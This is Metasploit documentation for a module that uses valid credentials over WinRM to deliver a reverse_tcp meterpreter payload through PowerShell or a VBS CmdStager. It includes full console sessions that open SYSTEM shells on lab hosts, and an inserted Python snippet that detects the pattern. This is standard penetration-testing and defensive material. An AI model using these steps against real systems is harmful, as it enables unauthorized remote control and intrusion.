
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/winrm/winrm_script_exec.md

Vulnerable Application

WinRM is a Windows-native, built-in remote management protocol that, in its simplest form, uses SOAP (Simple Object Access Protocol) to interface with remote computers and servers as well as with operating systems and applications. It handles remote connections by means of the WS-Management protocol, which is based on SOAP. This module uses valid credentials to log in to the WinRM service and execute a payload. It has two available methods for payload delivery: PowerShell 2.0 and the VBS CmdStager. The module first checks whether PowerShell 2.0 is available and, if so, uses that method; otherwise it falls back to the VBS CmdStager, which is less stealthy.
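As an added defender-side example (not part of the module or its documentation), the following Python flags the host-side pattern this module leaves behind: a script dropped into %TEMP% (a .ps1 for the PowerShell path, a .vbs for the CmdStager fallback) and a weakened execution policy, run by a child of the WinRM provider host. The event field names, the wsmprovhost.exe parent and the sample events are assumptions constructed here.

```python
import re

# Constructed sample process-creation events; not taken from the page or the
# module. Fields mimic a normalised Sysmon Event ID 1 / Security 4688 record.
SAMPLE_EVENTS = [
    {"parent": "wsmprovhost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File "
                r"C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1"},
    {"parent": "wsmprovhost.exe", "image": "cscript.exe",
     "cmdline": r"cscript.exe //nologo C:\Users\ADMINI~1\AppData\Local\Temp\stage.vbs"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": "wsmprovhost.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c hostname"},
]

# wsmprovhost.exe is the WinRM provider host that spawns remotely requested
# commands, so a child of it is a WinRM-originated process (assumed parent name).
WINRM_HOST = "wsmprovhost.exe"
# A .ps1 or .vbs script executed from a Temp directory, as the module drops it.
TEMP_SCRIPT = re.compile(r"\\Temp\\[^\\\s\"']+\.(ps1|vbs)\b", re.I)
# Execution policy weakened on the command line (-ExecutionPolicy / -ex / -ep).
EXEC_POLICY = re.compile(r"-e\w*\s+(bypass|unrestricted)", re.I)


def classify(event):
    """Return the list of indicators a single event matches (empty if none)."""
    reasons = []
    if event["parent"].lower() == WINRM_HOST:
        reasons.append("spawned_by_winrm")
    if TEMP_SCRIPT.search(event["cmdline"]):
        reasons.append("script_in_temp")
    if EXEC_POLICY.search(event["cmdline"]):
        reasons.append("execution_policy_weakened")
    return reasons


def flag_winrm_exec(events):
    """WinRM origin combined with a dropped script or policy change is high
    severity; WinRM origin alone is low, since legitimate remote
    administration produces the same parent/child relationship."""
    findings = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if not reasons:
            continue
        high = "spawned_by_winrm" in reasons and len(reasons) > 1
        findings.append({"index": i, "severity": "high" if high else "low",
                         "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in flag_winrm_exec(SAMPLE_EVENTS):
        print(finding)
```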

Example Usage

Windows 2008

PowerShell 2.0 is used for payload delivery here.

```
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444
[*] checking for Powershell 2.0
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (752128 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100

meterpreter > [*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (608)
[+] Migrating to 568
[+] Successfully migrated to process

meterpreter > sysinfo
Computer        : WIN-JZF4OTQMX4W
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 568
meterpreter >
```

The VBS CmdStager is used for payload delivery here (forced with FORCE_VBS).

```
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf exploit(winrm_script_exec) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
[*] Command Stager progress -   6.02% done (6138/101936 bytes)
[*] Command Stager progress -   8.03% done (8184/101936 bytes)
[*] Command Stager progress -  10.04% done (10230/101936 bytes)
[*] Command Stager progress -  12.04% done (12276/101936 bytes)
[*] Command Stager progress -  14.05% done (14322/101936 bytes)
[*] Command Stager progress -  16.06% done (16368/101936 bytes)
[*] Command Stager progress -  18.06% done (18414/101936 bytes)
[*] Command Stager progress -  20.07% done (20460/101936 bytes)
[*] Command Stager progress -  22.08% done (22506/101936 bytes)
[*] Command Stager progress -  24.09% done (24552/101936 bytes)
[*] Command Stager progress -  26.09% done (26598/101936 bytes)
[*] Command Stager progress -  28.10% done (28644/101936 bytes)
[*] Command Stager progress -  30.11% done (30690/101936 bytes)
[*] Command Stager progress -  32.11% done (32736/101936 bytes)
[*] Command Stager progress -  34.12% done (34782/101936 bytes)
[*] Command Stager progress -  36.13% done (36828/101936 bytes)
[*] Command Stager progress -  38.14% done (38874/101936 bytes)
[*] Command Stager progress -  40.14% done (40920/101936 bytes)
[*] Command Stager progress -  42.15% done (42966/101936 bytes)
[*] Command Stager progress -  44.16% done (45012/101936 bytes)
[*] Command Stager progress -  46.16% done (47058/101936 bytes)
[*] Command Stager progress -  48.17% done (49104/101936 bytes)
[*] Command Stager progress -  50.18% done (51150/101936 bytes)
[*] Command Stager progress -  52.19% done (53196/101936 bytes)
[*] Command Stager progress -  54.19% done (55242/101936 bytes)
[*] Command Stager progress -  56.20% done (57288/101936 bytes)
[*] Command Stager progress -  58.21% done (59334/101936 bytes)
[*] Command Stager progress -  60.21% done (61380/101936 bytes)
[*] Command Stager progress -  62.22% done (63426/101936 bytes)
[*] Command Stager progress -  64.23% done (65472/101936 bytes)
[*] Command Stager progress -  66.24% done (67518/101936 bytes)
[*] Command Stager progress -  68.24% done (69564/101936 bytes)
[*] Command Stager progress -  70.25% done (71610/101936 bytes)
[*] Command Stager progress -  72.26% done (73656/101936 bytes)
[*] Command Stager progress -  74.26% done (75702/101936 bytes)
[*] Command Stager progress -  76.27% done (77748/101936 bytes)
[*] Command Stager progress -  78.28% done (79794/101936 bytes)
[*] Command Stager progress -  80.29% done (81840/101936 bytes)
[*] Command Stager progress -  82.29% done (83886/101936 bytes)
[*] Command Stager progress -  84.30% done (85932/101936 bytes)
[*] Command Stager progress -  86.31% done (87978/101936 bytes)
[*] Command Stager progress -  88.31% done (90024/101936 bytes)
[*] Command Stager progress -  90.32% done (92070/101936 bytes)
[*] Command Stager progress -  92.33% done (94116/101936 bytes)
[*] Command Stager progress -  94.34% done (96162/101936 bytes)
[*] Command Stager progress -  96.34% done (98208/101936 bytes)
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Sending stage (752128 bytes) to 192.168.198.130
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100
[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: mSPvA.exe (3548)
[+] Migrating to 580
[+] Successfully migrated to process
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)

meterpreter > getpid
Current pid: 580
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-OPAUFTQFWTB
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```